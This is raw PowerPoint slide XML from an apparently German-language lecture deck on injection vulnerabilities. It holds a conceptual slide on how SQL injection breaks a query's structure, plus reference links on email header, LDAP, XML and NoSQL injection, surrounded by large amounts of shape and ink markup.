Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink801.xml"/><Relationship Id="rId232" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2170.png"/><Relationship Id="rId253" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2270.png"/><Relationship Id="rId274" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image512.png"/><Relationship Id="rId295" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink843.xml"/><Relationship Id="rId309" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink850.xml"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink729.xml"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3500.png"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink752.xml"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1690.png"/><Relationship Id="rId320" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image881.png"/><Relationship Id="rId155" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink773.xml"/><Relationship Id="rId176" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1890.png"/><Relationship Id="rId197" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink794.xml"/><Relationship Id="rId201" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink796.xml"/><Relationship Id="rId222" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2120.png"/><Relationship Id="rId243" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2220.png"/><Relationship Id="rId264" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image396.png"/><Relationship Id="rId285" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink838.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink724.xml"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1412.png"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink747.xml"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1640.png"/><Relationship Id="rId310" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2310.png"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink741.xml"/><Relationship Id="rId145" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink768.xml"/><Relationship Id="rId166" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1850.png"/><Relationship Id="rId187" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink789.xml"/><Relationship Id="rId331" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink861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070.png"/><Relationship Id="rId233" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink812.xml"/><Relationship Id="rId254" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink823.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1360.png"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink740.xml"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1590.png"/><Relationship Id="rId275" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink833.xml"/><Relationship Id="rId296" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1610.png"/><Relationship Id="rId300" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1810.png"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink763.xml"/><Relationship Id="rId156" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1800.png"/><Relationship Id="rId177" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink784.xml"/><Relationship Id="rId198" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2000.png"/><Relationship Id="rId321" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink856.xml"/><Relationship Id="rId202" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2020.png"/><Relationship Id="rId223" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink807.xml"/><Relationship Id="rId244" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink818.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1312.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink735.xml"/><Relationship Id="rId265" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image397.png"/><Relationship Id="rId286" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1110.png"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1540.png"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink758.xml"/><Relationship Id="rId146" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1750.png"/><Relationship Id="rId167" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink779.xml"/><Relationship Id="rId188" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1950.png"/><Relationship Id="rId311" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink851.xml"/><Relationship Id="rId332" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9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7.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image406.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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47172" y="1276655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6048A784-D831-4B4B-9022-AEF16F6913FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7484333" y="1344228"/>
            <a:ext cx="1528913" cy="1567552"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1528913"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1567552"/>
              <a:gd name="connsiteX1" fmla="*/ 494349 w 1528913"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1567552"/>
              <a:gd name="connsiteX2" fmla="*/ 958119 w 1528913"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 1567552"/>
              <a:gd name="connsiteX3" fmla="*/ 1528913 w 1528913"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 1567552"/>
              <a:gd name="connsiteX4" fmla="*/ 1528913 w 1528913"/>
              <a:gd name="connsiteY4" fmla="*/ 506842 h 1567552"/>
              <a:gd name="connsiteX5" fmla="*/ 1528913 w 1528913"/>
              <a:gd name="connsiteY5" fmla="*/ 998008 h 1567552"/>
              <a:gd name="connsiteX6" fmla="*/ 1528913 w 1528913"/>
              <a:gd name="connsiteY6" fmla="*/ 1567552 h 1567552"/>
              <a:gd name="connsiteX7" fmla="*/ 1019275 w 1528913"/>
              <a:gd name="connsiteY7" fmla="*/ 1567552 h 1567552"/>
              <a:gd name="connsiteX8" fmla="*/ 479059 w 1528913"/>
              <a:gd name="connsiteY8" fmla="*/ 1567552 h 1567552"/>
              <a:gd name="connsiteX9" fmla="*/ 0 w 1528913"/>
              <a:gd name="connsiteY9" fmla="*/ 1567552 h 1567552"/>
              <a:gd name="connsiteX10" fmla="*/ 0 w 1528913"/>
              <a:gd name="connsiteY10" fmla="*/ 1045035 h 1567552"/>
              <a:gd name="connsiteX11" fmla="*/ 0 w 1528913"/>
              <a:gd name="connsiteY11" fmla="*/ 538193 h 1567552"/>
              <a:gd name="connsiteX12" fmla="*/ 0 w 1528913"/>
              <a:gd name="connsiteY12" fmla="*/ 0 h 15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8913" h="1567552" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="151661" y="-564"/>
                  <a:pt x="281388" y="-15761"/>
                  <a:pt x="494349" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="707310" y="15761"/>
                  <a:pt x="858117" y="12664"/>
                  <a:pt x="958119" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1058121" y="-12664"/>
                  <a:pt x="1251707" y="20407"/>
                  <a:pt x="1528913" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1508124" y="246332"/>
                  <a:pt x="1514049" y="322357"/>
                  <a:pt x="1528913" y="506842"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1543777" y="691327"/>
                  <a:pt x="1516040" y="788238"/>
                  <a:pt x="1528913" y="998008"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1541786" y="1207778"/>
                  <a:pt x="1513652" y="1380199"/>
                  <a:pt x="1528913" y="1567552"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1332582" y="1569202"/>
                  <a:pt x="1148716" y="1589114"/>
                  <a:pt x="1019275" y="1567552"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="889834" y="1545990"/>
                  <a:pt x="725218" y="1549781"/>
                  <a:pt x="479059" y="1567552"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="232900" y="1585323"/>
                  <a:pt x="211632" y="1561407"/>
                  <a:pt x="0" y="1567552"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="25689" y="1416523"/>
                  <a:pt x="15740" y="1268661"/>
                  <a:pt x="0" y="1045035"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-15740" y="821409"/>
                  <a:pt x="-21984" y="783198"/>
                  <a:pt x="0" y="538193"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21984" y="293188"/>
                  <a:pt x="-5209" y="15689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0" name="Rechteck 739">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{561EC690-BEDA-4738-BD12-E80FA70B4028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9400292" y="2942110"/>
            <a:ext cx="2689712" cy="1639495"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 2689712"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1639495"/>
              <a:gd name="connsiteX1" fmla="*/ 645531 w 2689712"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1639495"/>
              <a:gd name="connsiteX2" fmla="*/ 1237268 w 2689712"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 1639495"/>
              <a:gd name="connsiteX3" fmla="*/ 1963490 w 2689712"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 1639495"/>
              <a:gd name="connsiteX4" fmla="*/ 2689712 w 2689712"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 1639495"/>
              <a:gd name="connsiteX5" fmla="*/ 2689712 w 2689712"/>
              <a:gd name="connsiteY5" fmla="*/ 530103 h 1639495"/>
              <a:gd name="connsiteX6" fmla="*/ 2689712 w 2689712"/>
              <a:gd name="connsiteY6" fmla="*/ 1043812 h 1639495"/>
              <a:gd name="connsiteX7" fmla="*/ 2689712 w 2689712"/>
              <a:gd name="connsiteY7" fmla="*/ 1639495 h 1639495"/>
              <a:gd name="connsiteX8" fmla="*/ 2017284 w 2689712"/>
              <a:gd name="connsiteY8" fmla="*/ 1639495 h 1639495"/>
              <a:gd name="connsiteX9" fmla="*/ 1425547 w 2689712"/>
              <a:gd name="connsiteY9" fmla="*/ 1639495 h 1639495"/>
              <a:gd name="connsiteX10" fmla="*/ 753119 w 2689712"/>
              <a:gd name="connsiteY10" fmla="*/ 1639495 h 1639495"/>
              <a:gd name="connsiteX11" fmla="*/ 0 w 2689712"/>
              <a:gd name="connsiteY11" fmla="*/ 1639495 h 1639495"/>
              <a:gd name="connsiteX12" fmla="*/ 0 w 2689712"/>
              <a:gd name="connsiteY12" fmla="*/ 1109392 h 1639495"/>
              <a:gd name="connsiteX13" fmla="*/ 0 w 2689712"/>
              <a:gd name="connsiteY13" fmla="*/ 579288 h 1639495"/>
              <a:gd name="connsiteX14" fmla="*/ 0 w 2689712"/>
              <a:gd name="connsiteY14" fmla="*/ 0 h 16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712" h="1639495" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="318099" y="-10057"/>
                  <a:pt x="443311" y="23563"/>
                  <a:pt x="645531" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="847751" y="-23563"/>
                  <a:pt x="1081480" y="15055"/>
                  <a:pt x="1237268" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1393056" y="-15055"/>
                  <a:pt x="1795889" y="-18496"/>
                  <a:pt x="1963490" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2131091" y="18496"/>
                  <a:pt x="2479986" y="-21961"/>
                  <a:pt x="2689712" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2696162" y="180679"/>
                  <a:pt x="2687426" y="360568"/>
                  <a:pt x="2689712" y="530103"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2691998" y="699638"/>
                  <a:pt x="2683199" y="902862"/>
                  <a:pt x="2689712" y="1043812"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2696225" y="1184762"/>
                  <a:pt x="2663209" y="1513217"/>
                  <a:pt x="2689712" y="1639495"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2393214" y="1665711"/>
                  <a:pt x="2292966" y="1657445"/>
                  <a:pt x="2017284" y="1639495"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1741602" y="1621545"/>
                  <a:pt x="1550803" y="1654232"/>
                  <a:pt x="1425547" y="1639495"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1300291" y="1624758"/>
                  <a:pt x="1066886" y="1641935"/>
                  <a:pt x="753119" y="1639495"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="439352" y="1637055"/>
                  <a:pt x="181735" y="1651193"/>
                  <a:pt x="0" y="1639495"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-18391" y="1442982"/>
                  <a:pt x="9763" y="1253998"/>
                  <a:pt x="0" y="1109392"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-9763" y="964786"/>
                  <a:pt x="8304" y="835575"/>
                  <a:pt x="0" y="579288"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-8304" y="323001"/>
                  <a:pt x="-518" y="1525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7" grpId="0" animBg="1"/>
      <p:bldP spid="7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30EA98EE-412C-46E2-88B7-B7FCA3ADF276}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="996793" y="1077384"/>
            <a:ext cx="10198413" cy="2432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main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>problem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE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input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>included</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t> (backend) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>context</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>messes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>up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predefined</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>structure</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" sz="6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324ED-6FA8-414B-8D1A-0CE5F9618E1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1551718" y="4389319"/>
            <a:ext cx="9088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any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other</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> backend </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>context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mess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with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br>
              <a:rPr lang="de-DE" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="de-DE" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(xxx </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)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D70FC0-8B43-4971-BA8E-417BEE0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backend </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>injections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9E414-BAA2-463C-AC0F-89D3DCD5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858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SMTP/Email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https://www.acunetix.com/blog/articles/email-header-injection/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LDAP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https://www.netsparker.com/blog/web-security/ldap-injection-how-to-prevent/ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>https://cheatsheetseries.owasp.org/cheatsheets/LDAP_Injection_Prevention_Cheat_Sheet.html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XML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http://projects.webappsec.org/w/page/13247004/XML%20Injection#:~:text=XML%20Injection%20is%20an%20attack,intend%20logic%20of%20the%20application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>https://www.whitehatsec.com/glossary/content/xml-injection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NoSQL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AT" dirty="0"/>
              <a:t>https://owasp.org/www-pdf-archive/GOD16-NOSQL.pdf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>https://www.netsparker.com/blog/web-security/what-is-nosql-injection/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>https://www.acunetix.com/blog/web-security-zone/nosql-injections/ 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5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534018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99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12361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4065654"/>
            <a:ext cx="4253553" cy="2592591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9A69FD5-C9BA-478D-99A3-681992EBA07A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9BAA366-AF6D-4946-94B4-B2A80239E879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C5CAD1F-F130-4C57-81A1-54E2BF95B30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0603052-767B-4A8E-9378-C34AED14647D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B18454C-65D3-4F9F-B69F-01004FD597A5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7E24BAE-5D20-4098-BCEA-9443374307E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="838615" y="547149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E303561-2809-4018-A4A1-8D43E7846174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6C01D7EE-F64A-4F37-A7AC-CDE68D757D3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E66B253-78CF-426F-BBCD-6D8C0CDC7C23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18AF9096-0301-4CB1-A9E8-0681BDB75A25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4C573B5-D355-4888-93FD-13CE773DD37C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BA22D1C-DA48-4AD6-B35E-BDE8EBAC2458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5046F34-AB03-407D-ACFE-A9BE9B0D4D6F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246770D-FC90-415E-ADD4-01821FE77D45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B32F8C8-B476-446C-ADAA-493F8C479FD9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F38376E0-E5E5-45AE-8420-F43EE8E8477A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77F98BA-76C7-493D-891B-349FD0EBEB82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E085404-5C04-4A2B-B64D-B9DC7338E39C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501CF93-3C6F-40A4-A21F-34699DE39470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5E0EF96-9BDD-4544-81DD-13856536C6A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B67ADB9-E23E-4217-8C13-25877BE929C4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B78F58A-35BA-452B-8770-898424EB8F7F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825D0CE-8EE1-413E-A7B6-EFCBED9287CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="812335" y="995367"/>
            <a:ext cx="1361520" cy="318240"/>
            <a:chOff x="3729526" y="1005434"/>
            <a:chExt cx="1361520" cy="318240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E1E8174-2710-4D91-A4D8-9AFF47E38E2A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3729526" y="1005434"/>
              <a:ext cx="1055520" cy="318240"/>
              <a:chOff x="3729526" y="1005434"/>
              <a:chExt cx="105552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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="3729526" y="1005434"/>
                  <a:ext cx="229320" cy="318240"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p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720526" y="996434"/>
                    <a:ext cx="24696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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="3775966" y="1163834"/>
                  <a:ext cx="100440" cy="1584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67326" y="1154834"/>
                    <a:ext cx="118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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="4019326" y="1006874"/>
                  <a:ext cx="21600" cy="2991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010686" y="997874"/>
                    <a:ext cx="3924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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="3973966" y="1096154"/>
                  <a:ext cx="119160" cy="12960"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p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64966" y="1087514"/>
                    <a:ext cx="1368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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="4179526" y="1013354"/>
                  <a:ext cx="37440" cy="29700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70526" y="1004354"/>
                    <a:ext cx="5508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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="4094206" y="1089674"/>
                  <a:ext cx="177480" cy="33120"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p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085206" y="1080674"/>
                    <a:ext cx="1951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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="4294726" y="1167794"/>
                  <a:ext cx="118080" cy="11808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286086" y="1158794"/>
                    <a:ext cx="1357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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="4423966" y="1165634"/>
                  <a:ext cx="57240" cy="108360"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p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14966" y="1156994"/>
                    <a:ext cx="748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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="4535926" y="1176794"/>
                  <a:ext cx="124920" cy="10908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526926" y="1168154"/>
                    <a:ext cx="1425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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="4672006" y="1061234"/>
                  <a:ext cx="24120" cy="229320"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p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663366" y="1052594"/>
                    <a:ext cx="4176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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="4706926" y="1144034"/>
                  <a:ext cx="78120" cy="140040"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p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697926" y="1135394"/>
                    <a:ext cx="9576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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4830766" y="1146554"/>
                <a:ext cx="120960" cy="1159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22126" y="1137554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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4994566" y="1115954"/>
                <a:ext cx="96480" cy="1630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85926" y="1106954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2D00B66-3C9C-4F21-9A79-2112801EDF94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="688966" y="840914"/>
            <a:ext cx="1555200" cy="87840"/>
            <a:chOff x="688966" y="840914"/>
            <a:chExt cx="15552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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="688966" y="914354"/>
                <a:ext cx="91440" cy="144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9966" y="905354"/>
                  <a:ext cx="10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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="889846" y="886274"/>
                <a:ext cx="97200" cy="136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1206" y="877634"/>
                  <a:ext cx="11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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1107286" y="886994"/>
                <a:ext cx="109080" cy="1296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8286" y="878354"/>
                  <a:ext cx="126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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1324366" y="876914"/>
                <a:ext cx="93600" cy="10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5726" y="867914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14:cNvPr>
                <p14:cNvContentPartPr/>
